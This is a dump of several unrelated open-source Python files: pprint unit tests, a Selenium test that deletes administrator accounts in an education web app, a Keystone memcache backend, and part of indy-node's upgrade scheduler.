        # Two list fixtures (Python 2: range() returns a list); self.b is
        # embedded inside self.a so nested-container handling is exercised.
        self.a = range(100)
        self.b = range(200)
        self.a[-12] = self.b
    def test_basic(self):
        # Verify .isrecursive() and .isreadable() w/o recursion
        # (self.assert_ is the pre-2.7 unittest alias of assertTrue).
        verify = self.assert_
        pp = pprint.PrettyPrinter()
        for safe in (2, 2.0, 2j, "abc", [3], (2,2), {3: 3}, uni("yaddayadda"),
                     self.a, self.b):
            # module-level convenience functions
            verify(not pprint.isrecursive(safe),
                   "expected not isrecursive for %r" % (safe,))
            verify(pprint.isreadable(safe),
                   "expected isreadable for %r" % (safe,))
            # PrettyPrinter methods
            verify(not pp.isrecursive(safe),
                   "expected not isrecursive for %r" % (safe,))
            verify(pp.isreadable(safe),
                   "expected isreadable for %r" % (safe,))
    def test_knotted(self):
        # Verify .isrecursive() and .isreadable() w/ recursion
        # Tie a knot.
        self.b[67] = self.a
        # Messy dict.
        self.d = {}
        self.d[0] = self.d[1] = self.d[2] = self.d

        verify = self.assert_
        pp = pprint.PrettyPrinter()

        # While the cycles exist, everything is recursive and unreadable.
        for icky in self.a, self.b, self.d, (self.d, self.d):
            verify(pprint.isrecursive(icky), "expected isrecursive")
            verify(not pprint.isreadable(icky),  "expected not isreadable")
            verify(pp.isrecursive(icky), "expected isrecursive")
            verify(not pp.isreadable(icky),  "expected not isreadable")

        # Break the cycles.
        self.d.clear()
        del self.a[:]
        del self.b[:]

        # After clearing, the same objects become safe again.
        for safe in self.a, self.b, self.d, (self.d, self.d):
            # module-level convenience functions
            verify(not pprint.isrecursive(safe),
                   "expected not isrecursive for %r" % (safe,))
            verify(pprint.isreadable(safe),
                   "expected isreadable for %r" % (safe,))
            # PrettyPrinter methods
            verify(not pp.isrecursive(safe),
                   "expected not isrecursive for %r" % (safe,))
            verify(pp.isreadable(safe),
                   "expected isreadable for %r" % (safe,))
    def test_unreadable(self):
        # Not recursive but not readable anyway
        # (types, modules and functions have no eval()-able repr).
        verify = self.assert_
        pp = pprint.PrettyPrinter()
        for unreadable in type(3), pprint, pprint.isrecursive:
            # module-level convenience functions
            verify(not pprint.isrecursive(unreadable),
                   "expected not isrecursive for %r" % (unreadable,))
            verify(not pprint.isreadable(unreadable),
                   "expected not isreadable for %r" % (unreadable,))
            # PrettyPrinter methods
            verify(not pp.isrecursive(unreadable),
                   "expected not isrecursive for %r" % (unreadable,))
            verify(not pp.isreadable(unreadable),
                   "expected not isreadable for %r" % (unreadable,))
    def test_same_as_repr(self):
        # Simple objects, small containers and classes that overwrite __repr__
        # For those the result should be the same as repr().
        # Ahem.  The docs don't say anything about that -- this appears to
        # be testing an implementation quirk.  Starting in Python 2.5, it's
        # not true for dicts:  pprint always sorts dicts by key now; before,
        # it sorted a dict display if and only if the display required
        # multiple lines.  For that reason, dicts with more than one element
        # aren't tested here.
        verify = self.assert_
        for simple in (0, 0L, 0+0j, 0.0, "", uni(""),
                       (), tuple2(), tuple3(),
                       [], list2(), list3(),
                       {}, dict2(), dict3(),
                       verify, pprint,
                       -6, -6L, -6-6j, -1.5, "x", uni("x"), (3,), [3], {3: 6},
                       (1,2), [3,4], {5: 6, 7: 8},
                       tuple2((1,2)), tuple3((1,2)), tuple3(range(100)),
                       [3,4], list2([3,4]), list3([3,4]), list3(range(100)),
                       {5: 6, 7: 8}, dict2({5: 6}), dict3({5: 6}),
                       range(10, -11, -1)
                      ):
            native = repr(simple)
            # Both pformat() and saferepr() must round-trip to repr().
            for function in "pformat", "saferepr":
                f = getattr(pprint, function)
                got = f(simple)
                verify(native == got, "expected %s got %s from pprint.%s" %
                                      (native, got, function))
    def test_basic_line_wrap(self):
        # verify basic line-wrapping operation
        o = {'RPM_cal': 0,
             'RPM_cal2': 48059,
             'Speed_cal': 0,
             'controldesk_runtime_us': 0,
             'main_code_runtime_us': 0,
             'read_io_runtime_us': 0,
             'write_io_runtime_us': 43690}
        # Expected text is flush-left: pprint wraps one key per line.
        exp = """\
{'RPM_cal': 0,
 'RPM_cal2': 48059,
 'Speed_cal': 0,
 'controldesk_runtime_us': 0,
 'main_code_runtime_us': 0,
 'read_io_runtime_us': 0,
 'write_io_runtime_us': 43690}"""
        # Both the builtin and the non-overriding subclass must match.
        for type in [dict, dict2]:
            self.assertEqual(pprint.pformat(type(o)), exp)

        o = range(100)
        exp = '[%s]' % ',\n '.join(map(str, o))
        for type in [list, list2]:
            self.assertEqual(pprint.pformat(type(o)), exp)

        o = tuple(range(100))
        exp = '(%s)' % ',\n '.join(map(str, o))
        for type in [tuple, tuple2]:
            self.assertEqual(pprint.pformat(type(o)), exp)

        # indent parameter
        o = range(100)
        exp = '[   %s]' % ',\n    '.join(map(str, o))
        for type in [list, list2]:
            self.assertEqual(pprint.pformat(type(o), indent=4), exp)
    def test_nested_indentations(self):
        # Nested containers must be indented by the `indent` parameter
        # at every nesting level, within the given width.
        o1 = list(range(10))
        o2 = dict(first=1, second=2, third=3)
        o = [o1, o2]
        expected = """\
[   [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
    {   'first': 1,
        'second': 2,
        'third': 3}]"""
        self.assertEqual(pprint.pformat(o, indent=4, width=42), expected)
    def test_sorted_dict(self):
        # Starting in Python 2.5, pprint sorts dict displays by key regardless
        # of how small the dictionary may be.
        # Before the change, on 32-bit Windows pformat() gave order
        # 'a', 'c', 'b' here, so this test failed.
        d = {'a': 1, 'b': 1, 'c': 1}
        self.assertEqual(pprint.pformat(d), "{'a': 1, 'b': 1, 'c': 1}")
        self.assertEqual(pprint.pformat([d, d]),
            "[{'a': 1, 'b': 1, 'c': 1}, {'a': 1, 'b': 1, 'c': 1}]")

        # The next one is kind of goofy.  The sorted order depends on the
        # alphabetic order of type names:  "int" < "str" < "tuple".  Before
        # Python 2.5, this was in the test_same_as_repr() test.  It's worth
        # keeping around for now because it's one of few tests of pprint
        # against a crazy mix of types.
        self.assertEqual(pprint.pformat({"xy\tab\n": (3,), 5: [[]], (): {}}),
            r"{5: [[]], 'xy\tab\n': (3,), (): {}}")
    def test_subclassing(self):
        # A PrettyPrinter subclass may customize formatting: here keys
        # without spaces are expected to be emitted without repr() quoting.
        # (DottedPrettyPrinter is defined elsewhere in this file.)
        o = {'names with spaces': 'should be presented using repr()',
             'others.should.not.be': 'like.this'}
        exp = """\
{'names with spaces': 'should be presented using repr()',
 others.should.not.be: like.this}"""
        self.assertEqual(DottedPrettyPrinter().pformat(o), exp)
def test_set_reprs(self):
self.assertEqual(pprint.pformat(set()), 'set()')
self.assertEqual(pprint.pformat(set(range(3))), 'set([0, 1, 2])')
self.assertEqual(pprint.pformat(frozenset()), 'frozenset()')
self.assertEqual(pprint.pformat(frozenset(range(3))), 'frozenset([0, 1, 2])')
cube_repr_tgt = """\
{frozenset([]): frozenset([frozenset([2]), frozenset([0]), frozenset([1])]),
frozenset([0]): frozenset([frozenset(),
frozenset([0, 2]),
frozenset([0, 1])]),
frozenset([1]): frozenset([frozenset(),
frozenset([1, 2]),
frozenset([0, 1])]),
frozenset([2]): frozenset([frozenset(),
frozenset([1, 2]),
frozenset([0, 2])]),
frozenset([1, 2]): frozenset([frozenset([2]),
frozenset([1]),
frozenset([0, 1, 2])]),
frozenset([0, 2]): frozenset([frozenset([2]),
frozenset([0]),
frozenset([0, 1, 2])]),
frozenset([0, 1]): frozenset([frozenset([0]),
frozenset([1]),
frozenset([0, 1, 2])]),
frozenset([0, 1, 2]): frozenset([frozenset([1, 2]),
frozenset([0, 2]),
frozenset([0, 1])])}"""
cube = test.test_set.cube(3)
self.assertEqual(pprint.pformat(cube), cube_repr_tgt)
cubo_repr_tgt = """\
{frozenset([frozenset([0, 2]), frozenset([0])]): frozenset([frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset([2]),
frozenset([0,
2])])]),
frozenset([frozenset([0, 1]), frozenset([1])]): frozenset([frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset([1]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([1])])]),
frozenset([frozenset([1, 2]), frozenset([1])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([1])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([1, 2]), frozenset([2])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([1]),
frozenset([1,
2])]),
frozenset([frozenset([2]),
frozenset([0,
2])]),
frozenset([frozenset(),
frozenset([2])])]),
frozenset([frozenset([]), frozenset([0])]): frozenset([frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset(),
frozenset([1])]),
frozenset([frozenset(),
frozenset([2])])]),
frozenset([frozenset([]), frozenset([1])]): frozenset([frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset([1]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([2])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([2]), frozenset([])]): frozenset([frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset(),
frozenset([1])]),
frozenset([frozenset([2]),
frozenset([0,
2])])]),
frozenset([frozenset([0, 1, 2]), frozenset([0, 1])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([0]), frozenset([0, 1])]): frozenset([frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([2]), frozenset([0, 2])]): frozenset([frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset(),
frozenset([2])])]),
frozenset([frozenset([0, 1, 2]), frozenset([0, 2])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset([2]),
frozenset([0,
2])])]),
frozenset([frozenset([1, 2]), frozenset([0, 1, 2])]): frozenset([frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset([1]),
frozenset([1,
2])])])}"""
cubo = test.test_set.linegraph(cube)
self.assertEqual(pprint.pformat(cubo), cubo_repr_tgt)
def test_depth(self):
nested_tuple = (1, (2, (3, (4, (5, 6)))))
nested_dict = {1: {2: {3: {4: {5: {6: 6}}}}}}
nested_list = [1, [2, [3, [4, [5, [6, []]]]]]]
self.assertEqual(pprint.pformat(nested_tuple), repr(nested_tuple))
self.assertEqual(pprint.pformat(nested_dict), repr(nested_dict))
self.assertEqual(pprint.pformat(nested_list), repr(nested_list))
lv1_tuple = '(1, (...))'
lv1_dict = '{1: {...}}'
lv1_list = '[1, [...]]'
self.assertEqual(pprint.pformat(nested_tuple, depth=1), lv1_tuple)
self.assertEqual(pprint.pformat(nested_dict, depth=1), lv1_dict)
self.assertEqual(pprint.pformat(nested_list, depth=1), lv1_list)
class DottedPrettyPrinter(pprint.PrettyPrinter):
    """PrettyPrinter that prints dotted identifiers without quotes.

    Strings containing a space are rendered via repr() (quoted and
    flagged readable); every other string is emitted verbatim and
    flagged non-readable.  Non-strings fall through to the base class.
    """

    def format(self, object, context, maxlevels, level):
        # Return contract (see pprint.PrettyPrinter.format):
        # (formatted_string, readable_flag, recursive_flag).
        if isinstance(object, str):
            if ' ' in object:
                return repr(object), 1, 0
            else:
                return object, 0, 0
        else:
            return pprint.PrettyPrinter.format(
                self, object, context, maxlevels, level)
def test_main():
    # Python 2 test-harness entry point; test.test_support was renamed to
    # test.support in Python 3.
    test.test_support.run_unittest(QueryTestCase)

if __name__ == "__main__":
    test_main()
| apache-2.0 |
sysuwuhaibin/vatus | vatus/testcases/test_education/test_user_management/test_E139_delete_administrator.py | 1 | 5779 | # -*- coding: utf-8 -*-
import time
import unittest
from selenium import webdriver
import settings
class DeleteAdministrator(unittest.TestCase):
def setUp(self):
    # The WebDriver is created lazily inside the test itself (one driver
    # per browser type in web_types); keep None until then.
    self.driver = None
    self.base_url = settings.test_parameters.get("education_base_url")
def test_E139_delete_administrator(self):
    # E139: deleting administrator accounts via the user-management UI,
    # exercised once per configured browser type.
    web_types = settings.test_parameters.get("web_types")
    for web_type in web_types:
        if web_type == 'firefox':
            self.driver = webdriver.Firefox()
        elif web_type == 'chrome':
            self.driver = webdriver.Chrome()
        self.driver.implicitly_wait(30)
        driver = self.driver
        driver.get(self.base_url)
        driver.maximize_window()
        ###########################################
        # Precondition: log into the system and create the test data
        ###########################################
        driver.find_element_by_id("input_username").clear()
        driver.find_element_by_id("input_username").send_keys(settings.test_parameters.get("admin_username"))
        driver.find_element_by_id("input_password").clear()
        driver.find_element_by_id("input_password").send_keys(settings.test_parameters.get("admin_password"))
        driver.find_element_by_id("login_btn").click()
        time.sleep(5)
        # Link texts below are the Chinese UI labels ("user management",
        # "administrator"); they are runtime locators and must stay as-is.
        driver.find_element_by_link_text(u"用户管理").click()
        time.sleep(1)
        driver.find_element_by_link_text(u"管理员").click()
        time.sleep(3)
        # Create four throw-away administrator accounts to delete.
        teacher_names = ['deleteadmin01','deleteadmin02','deleteadmin03','deleteadm04']
        for teacher_name in teacher_names:
            driver.find_element_by_id("create_user").click()
            time.sleep(1)
            driver.find_element_by_id("username").clear()
            driver.find_element_by_id("username").send_keys(teacher_name)
            driver.find_element_by_id("fullname").clear()
            driver.find_element_by_id("fullname").send_keys(teacher_name)
            driver.find_element_by_id("email").clear()
            driver.find_element_by_id("email").send_keys(teacher_name+"@vinzor.com")
            driver.find_element_by_id("password").clear()
            driver.find_element_by_id("password").send_keys("123456")
            driver.find_element_by_id("confirm").clear()
            driver.find_element_by_id("confirm").send_keys("123456")
            time.sleep(3)
            driver.find_element_by_id("confirm_action").click()
            time.sleep(5)
        ###########################################
        # Step 1: click "Delete" without selecting any record; a warning
        # toast ("please select one or more users to delete") must appear
        ###########################################
        time.sleep(5)
        driver.find_element_by_id("delete_users").click()
        time.sleep(1)
        self.assertEqual("请选择一个或多个要删除的用户", driver.find_element_by_class_name("gritter-without-image").
                         find_element_by_tag_name("p").text)
        time.sleep(8)
        ###########################################
        # Step 2: multi-select delete (select-all checkbox on the
        # filtered "deleteadmin" rows, then confirm)
        ###########################################
        driver.find_element_by_css_selector("input.form-control.input-sm").clear()
        driver.find_element_by_css_selector("input.form-control.input-sm").send_keys("deleteadmin")
        time.sleep(5)
        # Chrome cannot click the hidden checkbox directly, so it is
        # clicked through ActionChains instead.
        if web_type == 'firefox':
            driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
                                         "div[2]/div[2]/div/table/thead/tr/th[1]/label/input").click()
        elif web_type == 'chrome':
            element = driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
                                                   "div[2]/div[2]/div/table/thead/tr/th[1]/label/input")
            webdriver.ActionChains(driver).move_to_element(element).click().perform()
        time.sleep(3)
        driver.find_element_by_id("delete_users").click()
        time.sleep(3)
        driver.find_element_by_id("confirm_delete").click()
        time.sleep(3)
        ###########################################
        # Step 3: open the delete dialog but cancel; then single-select
        # delete the remaining "deleteadm" account
        ###########################################
        driver.find_element_by_css_selector("input.form-control.input-sm").clear()
        driver.find_element_by_css_selector("input.form-control.input-sm").send_keys("deleteadm")
        time.sleep(5)
        driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
                                     "div[2]/div[2]/div/table/tbody/tr/td[6]/div/a[2]").click()
        time.sleep(5)
        driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[4]/div[2]/div/div[3]/button[2]").click()
        time.sleep(3)
        driver.find_element_by_css_selector("input.form-control.input-sm").clear()
        driver.find_element_by_css_selector("input.form-control.input-sm").send_keys("deleteadm")
        time.sleep(5)
        driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
                                     "div[2]/div[2]/div/table/tbody/tr/td[6]/div/a[2]").click()
        time.sleep(3)
        driver.find_element_by_id("confirm_delete").click()
        time.sleep(3)
        # NOTE(review): the driver is quit here *and* again in tearDown();
        # the second quit() is redundant, and an assertion failure above
        # would leak the driver for this iteration -- confirm intended.
        driver.quit()
def tearDown(self):
    """Quit the last created WebDriver, if any.

    Bug fix: setUp() initialises self.driver to None and the test only
    assigns a real driver inside its browser loop, so an empty
    web_types list (or a failure before the first driver is created)
    used to make this raise AttributeError on None.
    """
    if self.driver is not None:
        self.driver.quit()
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
HugoKuo/keystone-essex3 | keystone/backends/memcache/__init__.py | 2 | 2658 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import logging
from keystone.common import config
from keystone.backends.memcache import models
import keystone.utils as utils
import keystone.backends.api as top_api
import keystone.backends.models as top_models
import memcache
MODEL_PREFIX = 'keystone.backends.memcache.models.'
API_PREFIX = 'keystone.backends.memcache.api.'
MEMCACHE_SERVER = None
CACHE_TIME = 86400
def configure_backend(options):
    """Wire up the memcache backend from the keystone options dict.

    Creates the module-level Memcache_Server singleton (first call
    only), registers the backend models, then resolves the configured
    cache lifetime.  NOTE(review): CACHE_TIME is assigned *last*, so
    anything that captured its value before this runs still sees the
    module default (86400) -- confirm callers rely on the global, not
    on a copy.
    """
    hosts = options['memcache_hosts']
    global MEMCACHE_SERVER
    if not MEMCACHE_SERVER:
        MEMCACHE_SERVER = Memcache_Server(hosts)
    register_models(options)
    global CACHE_TIME
    CACHE_TIME = config.get_option(
        options, 'cache_time', type='int', default=86400)
class Memcache_Server():
    """Thin wrapper around memcache.Client used by this backend.

    Keys are UTF-8 encoded before being handed to python-memcached.
    """

    def __init__(self, hosts):
        # hosts comes straight from the 'memcache_hosts' option.
        self.hosts = hosts
        self.server = memcache.Client([self.hosts])

    def set(self, key, value, expiry=None):
        """
        This method is used to set a new value
        in the memcache server.

        Bug fix: the signature used to be ``expiry=CACHE_TIME``, which
        froze the module default (86400) at class-definition time, so
        the 'cache_time' option applied later by configure_backend()
        was silently ignored.  Resolving the default at call time
        honours the configured value.
        """
        if expiry is None:
            expiry = CACHE_TIME
        self.server.set(key.encode('utf-8'), value, expiry)

    def get(self, key):
        """
        This method is used to retrieve a value
        from the memcache server
        """
        return self.server.get(key.encode('utf-8'))

    def delete(self, key):
        """
        This method is used to delete a value from the
        memcached server. Lazy delete
        """
        self.server.delete(key.encode('utf-8'))
def register_models(options):
    """Register Models and create properties.

    'backend_entities' holds a Python list literal as a string (hence
    ast.literal_eval) naming the model modules to load.  Each model is
    published on the shared model registry; if the model declares an
    API module via __api__, that API singleton is published as well.
    """
    supported_memcache_models = ast.literal_eval(
        options["backend_entities"])
    for supported_memcache_model in supported_memcache_models:
        model = utils.import_module(MODEL_PREFIX + supported_memcache_model)
        top_models.set_value(supported_memcache_model, model)
        if model.__api__ is not None:
            model_api = utils.import_module(API_PREFIX + model.__api__)
            top_api.set_value(model.__api__, model_api.get())
| apache-2.0 |
TechWritingWhiz/indy-node | indy_node/server/upgrader.py | 1 | 21223 | import os
from collections import deque
from datetime import datetime, timedelta
from functools import partial
from typing import Tuple, Union, Optional, Callable, Dict
import dateutil.parser
import dateutil.tz
from stp_core.common.log import getlogger
from plenum.common.constants import TXN_TYPE, VERSION, DATA, IDENTIFIER
from plenum.common.types import f
from plenum.server.has_action_queue import HasActionQueue
from indy_common.constants import ACTION, POOL_UPGRADE, START, SCHEDULE, \
CANCEL, JUSTIFICATION, TIMEOUT, REINSTALL, NODE_UPGRADE, IN_PROGRESS, FORCE
from indy_node.server.upgrade_log import UpgradeLog
from plenum.server import notifier_plugin_manager
from ledger.util import F
import asyncio
logger = getlogger()
class Upgrader(HasActionQueue):
defaultUpgradeTimeout = 10 # minutes
@staticmethod
def getVersion():
    # Imported lazily -- presumably to avoid a circular import at module
    # load time; the metadata module only carries the version string.
    from indy_node.__metadata__ import __version__
    return __version__
@staticmethod
def is_version_upgradable(old, new, reinstall: bool = False):
    """Return True if moving from `old` to `new` is allowed.

    Allowed when `new` is strictly newer than `old`
    (compareVersions(old, new) > 0), or when the versions are equal and
    a reinstall was explicitly requested.

    The original expression relied on `and` binding tighter than `or`;
    the parentheses below make that precedence explicit without
    changing the result.
    """
    return (Upgrader.compareVersions(old, new) > 0) \
        or ((Upgrader.compareVersions(old, new) == 0) and reinstall)
@staticmethod
def compareVersions(verA: str, verB: str) -> int:
    """Compare two dotted version strings.

    Returns 0 when equal, 1 when verB is the newer version and -1 when
    verA is newer (note the inverted sign relative to the usual cmp()
    convention: callers test ``> 0`` to mean "verB is an upgrade").
    """
    if verA == verB:
        return 0

    def parse(x):
        # Strip a single trailing ".0" so e.g. "1.2.0" parses like
        # "1.2".  NOTE(review): applied only once, so "1.0.0" becomes
        # [1, 0] rather than [1]; trailing-zero forms of different
        # lengths are therefore not always treated as equal -- confirm
        # intended.
        if x.endswith(".0"):
            x = x[:-2]
        return [int(num) for num in x.split(".")]
    partsA = parse(verA)
    partsB = parse(verB)
    for a, b in zip(partsA, partsB):
        if a > b:
            return -1
        if b > a:
            return 1
    # All shared components equal: the longer version wins.
    lenA = len(list(partsA))
    lenB = len(list(partsB))
    if lenA > lenB:
        return -1
    if lenB > lenA:
        return 1
    return 0
@staticmethod
def get_upgrade_id(txn):
seq_no = txn.get(F.seqNo.name, '')
if txn.get(FORCE, None):
seq_no = ''
return '{}{}'.format(txn[f.REQ_ID.nm], seq_no)
@staticmethod
def get_timeout(timeout):
    # Convert a timeout given in minutes into seconds.
    # NOTE(review): .seconds is the seconds *component* (wraps at 24h),
    # not total_seconds(); a timeout of a day or more would truncate.
    return timedelta(minutes=timeout).seconds
def __defaultLog(self, dataDir, config):
log = os.path.join(dataDir, config.upgradeLogFile)
return UpgradeLog(filePath=log)
def __init__(self,
nodeId,
nodeName,
dataDir,
config,
ledger,
upgradeLog: UpgradeLog = None,
upgradeFailedCallback: Callable = None,
upgrade_start_callback: Callable = None):
self.nodeId = nodeId
self.nodeName = nodeName
self.config = config
self.dataDir = dataDir
self.ledger = ledger
self.scheduledUpgrade = None # type: Tuple[str, int, str]
self._notifier = notifier_plugin_manager.PluginManager()
self._upgradeLog = upgradeLog if upgradeLog else \
self.__defaultLog(dataDir, config)
self._upgradeFailedCallback = \
upgradeFailedCallback if upgradeFailedCallback else lambda: None
self._upgrade_start_callback = \
upgrade_start_callback if upgrade_start_callback else lambda: None
self.retry_timeout = 5
self.retry_limit = 3
self.process_upgrade_log_for_first_run()
HasActionQueue.__init__(self)
def __repr__(self):
# Since nodeid can be null till pool ledger has not caught up
return self.nodeId or ''
def service(self):
return self._serviceActions()
def process_upgrade_log_for_first_run(self):
# whether upgrade was started before the Node restarted,
# that is whether Upgrade Log contains STARTED event
self._upgrade_started = self._is_upgrade_started()
if self._upgrade_started:
# append SUCCESS or FAIL to the Upgrade Log
self._update_upgrade_log_for_started_upgrade()
def _is_upgrade_started(self):
if not self.lastUpgradeEventInfo:
logger.debug('Node {} has no upgrade events'
.format(self.nodeName))
return False
(event_type, when, version, upgrade_id) = self.lastUpgradeEventInfo
if event_type != UpgradeLog.UPGRADE_STARTED:
logger.debug(
'Upgrade for node {} was not scheduled. Last event is {}:{}:{}:{}'.format(
self.nodeName, event_type, when, version, upgrade_id))
return False
return True
def _update_upgrade_log_for_started_upgrade(self):
(event_type, when, version, upgrade_id) = self.lastUpgradeEventInfo
if not self.didLastExecutedUpgradeSucceeded:
self._upgradeLog.appendFailed(when, version, upgrade_id)
self._upgrade_failed(version=version,
scheduled_on=when,
upgrade_id=upgrade_id,
external_reason=True)
return
self._upgradeLog.appendSucceeded(when, version, upgrade_id)
logger.info("Node '{}' successfully upgraded to version {}"
.format(self.nodeName, version))
self._notifier.sendMessageUponNodeUpgradeComplete(
"Upgrade of node '{}' to version {} scheduled on {} "
" with upgrade_id {} completed successfully"
.format(self.nodeName, version, when, upgrade_id))
def should_notify_about_upgrade_result(self):
# do not rely on NODE_UPGRADE txn in config ledger, since in some cases (for example, when
# we run POOL_UPGRADE with force=true), we may not have IN_PROGRESS NODE_UPGRADE in the ledger.
# send NODE_UPGRADE txn only if we were in Upgrade Started state at the very beginning (after Node restarted)
return self._upgrade_started
def notified_about_upgrade_result(self):
self._upgrade_started = False
def get_last_node_upgrade_txn(self, start_no: int = None):
return self.get_upgrade_txn(
lambda txn: txn[TXN_TYPE] == NODE_UPGRADE and txn[IDENTIFIER] == self.nodeId,
start_no=start_no,
reverse=True)
def get_upgrade_txn(self, predicate: Callable = None, start_no: int = None,
reverse: bool = False) -> Optional[Dict]:
def txn_filter(txn):
return not predicate or predicate(txn)
def traverse_end_condition(seq_no):
if reverse:
return seq_no > 0
return seq_no <= len(self.ledger)
inc = 1
init_start_no = 1
if reverse:
inc = -1
init_start_no = len(self.ledger)
seq_no = start_no if start_no is not None else init_start_no
while traverse_end_condition(seq_no):
txn = self.ledger.getBySeqNo(seq_no)
if txn_filter(txn):
return txn
seq_no += inc
return None
@property
def lastUpgradeEventInfo(self) -> Optional[Tuple[str, str, str, str]]:
"""
(event, when, version, upgrade_id) of last performed upgrade
:returns: (event, when, version, upgrade_id) or None if there were no upgrades
"""
last_event = self._upgradeLog.lastEvent
return last_event[1:] if last_event else None
# TODO: PoolConfig and Updater both read config ledger independently
def processLedger(self) -> None:
"""
Checks ledger for planned but not yet performed upgrades
and schedules upgrade for the most recent one
Assumption: Only version is enough to identify a release, no hash
checking is done
:return:
"""
logger.debug(
'{} processing config ledger for any upgrades'.format(self))
last_pool_upgrade_txn_start = self.get_upgrade_txn(
lambda txn: txn[TXN_TYPE] == POOL_UPGRADE and txn[ACTION] == START, reverse=True)
if last_pool_upgrade_txn_start:
logger.info('{} found upgrade START txn {}'.format(
self, last_pool_upgrade_txn_start))
last_pool_upgrade_txn_seq_no = last_pool_upgrade_txn_start[F.seqNo.name]
# searching for CANCEL for this upgrade submitted after START txn
last_pool_upgrade_txn_cancel = self.get_upgrade_txn(
lambda txn:
txn[TXN_TYPE] == POOL_UPGRADE and txn[ACTION] == CANCEL and
txn[VERSION] == last_pool_upgrade_txn_start[VERSION],
start_no=last_pool_upgrade_txn_seq_no + 1)
if last_pool_upgrade_txn_cancel:
logger.info('{} found upgrade CANCEL txn {}'.format(
self, last_pool_upgrade_txn_cancel))
return
self.handleUpgradeTxn(last_pool_upgrade_txn_start)
@property
def didLastExecutedUpgradeSucceeded(self) -> bool:
"""
Checks last record in upgrade log to find out whether it
is about scheduling upgrade. If so - checks whether current version
is equals to the one in that record
:returns: upgrade execution result
"""
lastEventInfo = self.lastUpgradeEventInfo
if lastEventInfo:
currentVersion = self.getVersion()
scheduledVersion = lastEventInfo[2]
return self.compareVersions(currentVersion, scheduledVersion) == 0
return False
def isScheduleValid(self, schedule, node_srvs, force) -> (bool, str):
"""
Validates schedule of planned node upgrades
:param schedule: dictionary of node ids and upgrade times
:param nodeSrvs: dictionary of node ids and services
:return: whether schedule valid
"""
# flag "force=True" ignore basic checks! only datetime format is
# checked
times = []
non_demoted_nodes = set([k for k, v in node_srvs.items() if v])
if not force and set(schedule.keys()) != non_demoted_nodes:
return False, 'Schedule should contain id of all nodes'
now = datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc())
for dateStr in schedule.values():
try:
when = dateutil.parser.parse(dateStr)
if when <= now and not force:
return False, '{} is less than current time'.format(when)
times.append(when)
except ValueError:
return False, '{} cannot be parsed to a time'.format(dateStr)
if force:
return True, ''
times = sorted(times)
for i in range(len(times) - 1):
diff = (times[i + 1] - times[i]).seconds
if diff < self.config.MinSepBetweenNodeUpgrades:
return False, 'time span between upgrades is {} ' \
'seconds which is less than specified ' \
'in the config'.format(diff)
return True, ''
def handleUpgradeTxn(self, txn) -> None:
"""
Handles transaction of type POOL_UPGRADE
Can schedule or cancel upgrade to a newer
version at specified time
:param txn:
"""
FINALIZING_EVENT_TYPES = [
UpgradeLog.UPGRADE_SUCCEEDED, UpgradeLog.UPGRADE_FAILED]
if txn[TXN_TYPE] != POOL_UPGRADE:
return
logger.info("Node '{}' handles upgrade txn {}".format(
self.nodeName, txn))
action = txn[ACTION]
version = txn[VERSION]
justification = txn.get(JUSTIFICATION)
reinstall = txn.get(REINSTALL, False)
currentVersion = self.getVersion()
upgrade_id = self.get_upgrade_id(txn)
if action == START:
# forced txn could have partial schedule list
if self.nodeId not in txn[SCHEDULE]:
logger.info("Node '{}' disregards upgrade txn {}".format(
self.nodeName, txn))
return
